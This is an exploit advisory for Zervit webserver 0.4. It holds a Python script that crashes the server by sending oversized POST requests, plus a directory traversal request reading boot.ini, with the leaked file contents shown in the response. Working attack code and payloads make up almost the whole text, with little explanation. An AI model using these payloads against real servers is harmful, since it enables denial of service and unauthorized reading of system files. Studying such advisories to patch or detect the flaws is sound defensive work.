Zervit webserver 0.4 Directory Traversal & Memory Corruption


By: e.wiZz! & shinnai

Site: shinnai.net & balcansecurity.com



[Memory Corruption]
########################################################################

import socket

host = "127.0.0.1"
port = 8080

try:
       for i in range(1,10):
              buff = "a" * 3330
              request =  "POST " + buff + " HTTP/1.0"
              connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
              connection.connect((host, port))
              connection.send(request)
except:
       raw_input('\n\nUnable to connect. Press "Enter" to quit...')



[Directory traversal]
#################################################################################

[Request]

GET /../../../../../boot.ini HTTP/1.1
User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1
Host: localhost:80
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
#################################################

[Response]

HTTP/1.1 200 OK
Server: Zervit 0.4
X-Powered-By: Carbono
Connection: close
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 355

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT
##################################################